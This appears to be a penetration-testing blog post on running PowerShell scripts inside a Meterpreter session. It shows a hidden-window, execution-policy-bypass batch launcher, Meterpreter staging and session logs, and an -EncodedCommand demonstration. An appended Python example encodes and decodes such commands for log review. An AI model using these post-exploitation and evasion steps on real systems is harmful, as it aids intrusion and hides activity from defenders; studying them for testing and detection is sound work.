Channel: Carnal0wnage & Attack Research Blog

Run a PowerShell module in Meterpreter

I don't know why, but PowerShell and Meterpreter just don't play nice.

Part of it is the whole interactive shell-ness of PowerShell: if you just type "powershell" once you drop to a cmd.exe shell, you won't ever get the PowerShell prompt.

In a similar vein, I've been unable to get any combination of execute -f powershell.exe -a "blah blah" to work either. If anyone has the magic syntax, I know lots of people who would be interested. (Actually, Carlos Perez hooked me up; answer below.)

So, you can run PowerShell scripts via .bat files, and those execute just fine from within cmd.exe, from the "execute" command, or with the -EncodedCommand option.


C:\>type run_ps.bat
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\do_neat_ps_stuff.ps1

Example:

meterpreter > execute -H -f cmd.exe -a '/c C:\runps.bat'
Process 28536 created.
meterpreter > 
[*] 4.5.6.21:3863 Request received for /vLNL...
[*] 4.5.6.21:3863 Staging connection for target /vLNL received...
--snip--
[*] Patched Communication Timeout at offset 653608...
[*] Meterpreter session 9 opened (1.2.3.205:443 -> 4.5.6.21:3863) at 2012-09-09 16:29:30 -0400

Carlos Perez mentioned at DerbyCon that you can also do the following:

On Linux, download this script: https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.py or, if on Windows, download the EXE: https://github.com/darkoperator/powershell_scripts/blob/master/ps_encoder.exe

You can use it to encode a script and then run it like so:

msf  exploit(handler) > 
[*] Sending stage (752128 bytes) to 192.168.1.225
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.225:49163) at 2012-09-17 15:58:33 -0400

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell 
Process 3416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\carlos\Desktop>powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA=
powershell.exe -encodedcommand dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA=
hello world

C:\Users\carlos\Desktop>
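As an added example (not from the post and not Carlos's ps_encoder.py), this is what the encoding step actually does: the -EncodedCommand argument is plain base64 over the UTF-16LE bytes of the script. The same routine run backwards is what you want when reviewing process-creation logs, so the block also pulls and decodes the argument out of a command line. The command line and script text are constructed sample values.

```python
import base64
import re

# Constructed sample values (not taken from the post): a script body and the
# command line a process-creation event (Sysmon/EDR) would show for it.
SAMPLE_SCRIPT = "write-host hello world"
SAMPLE_CMDLINE = (
    "powershell.exe -NoProfile -EncodedCommand "
    "dwByAGkAdABlAC0AaABvAHMAdAAgAGgAZQBsAGwAbwAgAHcAbwByAGwAZAA="
)


def encode_command(script: str) -> str:
    """Build the -EncodedCommand argument: base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Reverse of encode_command; raises ValueError on malformed input."""
    raw = base64.b64decode(blob, validate=True)  # binascii.Error is a ValueError
    if len(raw) % 2:
        raise ValueError("UTF-16LE payload has odd length")
    return raw.decode("utf-16-le")


_FLAG = re.compile(r"^[-/](\w+)$")


def _is_encoded_flag(token: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...)."""
    m = _FLAG.match(token)
    if not m:
        return False
    flag = m.group(1).lower()
    return flag.startswith("e") and "encodedcommand".startswith(flag)


def extract_encoded_commands(cmdline: str) -> list:
    """Decode every -EncodedCommand argument found in a process command line.

    A flag whose argument does not decode is reported as None so the reviewer
    still sees that an encoded invocation was attempted.
    """
    tokens = cmdline.split()
    found = []
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_flag(tok):
            try:
                found.append(decode_command(tokens[i + 1]))
            except (ValueError, UnicodeDecodeError):
                found.append(None)
    return found
```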
